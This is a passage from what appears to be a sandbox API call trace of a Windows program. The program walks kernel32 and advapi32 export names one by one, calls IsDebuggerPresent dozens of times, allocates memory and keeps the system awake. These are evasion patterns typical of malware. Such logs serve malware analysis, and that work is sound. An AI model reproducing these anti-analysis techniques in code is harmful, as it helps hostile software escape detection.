returned="CreateFileMappingNumaW" [0030.795] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0030.795] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0030.795] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0030.795] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0030.795] lstrlenA (lpString="CREATEFILEW") returned 11 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0030.795] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0030.795] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0030.795] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0030.795] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0030.795] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0030.795] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0030.795] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0030.795] lstrlenA (lpString="CREATEJOBSET") returned 12 [0030.795] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0030.795] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0030.796] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0030.796] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0030.796] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0030.796] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0030.796] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0030.796] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0030.796] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0030.796] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0030.796] lstrlenA (lpString="CREATEPIPE") returned 10 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0030.796] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0030.796] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0030.796] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0030.796] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0030.796] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0030.796] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0030.796] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0030.796] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0030.797] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0030.797] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0030.797] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0030.797] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0030.797] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0030.797] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0030.797] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0030.797] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0030.797] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0030.797] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0030.797] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0030.797] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0030.797] lstrlenA (lpString="CREATETHREAD") returned 12 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0030.797] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0030.797] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0030.797] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0030.797] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0030.797] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0030.798] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0030.798] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0030.798] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0030.798] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0030.798] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0030.798] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0030.798] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0030.798] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0030.798] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0030.798] lstrlenA (lpString="CTRLROUTINE") returned 11 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0030.798] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0030.798] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0030.798] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0030.798] lstrlenA (lpString="DEBUGBREAK") returned 10 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0030.798] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0030.798] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0030.798] lstrlenA (lpString="DECODEPOINTER") returned 13 [0030.798] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0030.799] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0030.799] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0030.799] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0030.799] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0030.799] lstrlenA (lpString="DELETEATOM") returned 10 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0030.799] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0030.799] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0030.799] lstrlenA (lpString="DELETEFIBER") returned 11 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0030.799] lstrlenA (lpString="DELETEFILEA") returned 11 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0030.799] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0030.799] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0030.799] lstrlenA (lpString="DELETEFILEW") returned 11 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0030.799] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0030.799] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0030.799] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0030.799] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0030.799] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0030.799] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0030.800] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0030.800] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0030.800] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0030.800] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0030.800] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0030.800] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0030.800] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0030.800] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0030.800] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0030.800] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0030.800] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0030.800] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0030.800] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0030.800] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0030.800] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0030.800] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0030.800] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0030.800] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0030.801] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0030.801] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0030.801] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0030.801] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0030.801] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0030.801] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0030.801] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0030.801] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0030.801] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0030.801] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0030.801] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0030.801] lstrcpyA (in: lpString1=0xc9ea48, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0030.802] IsDebuggerPresent () returned 0 [0030.802] IsDebuggerPresent () returned 0 [0030.802] IsDebuggerPresent () returned 0 [0030.802] IsDebuggerPresent () returned 0 [0030.802] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.803] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.804] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.805] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.806] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.807] IsDebuggerPresent () returned 0 [0030.814] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0030.821] SetThreadExecutionState (esFlags=0x80000001) returned 0x80000000 [0030.822] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x130000 [0030.826] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x140000 [0030.826] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0030.829] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0030.829] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0030.829] lstrlenA (lpString="advapi32.dll") returned 12 [0030.830] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x74d40000 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="A_SHAFinal" | out: lpString1="A_SHAFinal") returned="A_SHAFinal" [0030.830] lstrlenA (lpString="A_SHAFINAL") returned 10 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="A_SHAInit" | out: lpString1="A_SHAInit") returned="A_SHAInit" [0030.830] lstrlenA (lpString="A_SHAINIT") returned 9 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="A_SHAUpdate" | out: lpString1="A_SHAUpdate") returned="A_SHAUpdate" [0030.830] lstrlenA (lpString="A_SHAUPDATE") returned 11 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AbortSystemShutdownA" | out: lpString1="AbortSystemShutdownA") returned="AbortSystemShutdownA" [0030.830] lstrlenA (lpString="ABORTSYSTEMSHUTDOWNA") returned 20 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AbortSystemShutdownW" | out: lpString1="AbortSystemShutdownW") returned="AbortSystemShutdownW" [0030.830] lstrlenA (lpString="ABORTSYSTEMSHUTDOWNW") returned 20 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheck" | out: lpString1="AccessCheck") returned="AccessCheck" [0030.830] lstrlenA (lpString="ACCESSCHECK") returned 11 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckAndAuditAlarmA" | out: lpString1="AccessCheckAndAuditAlarmA") 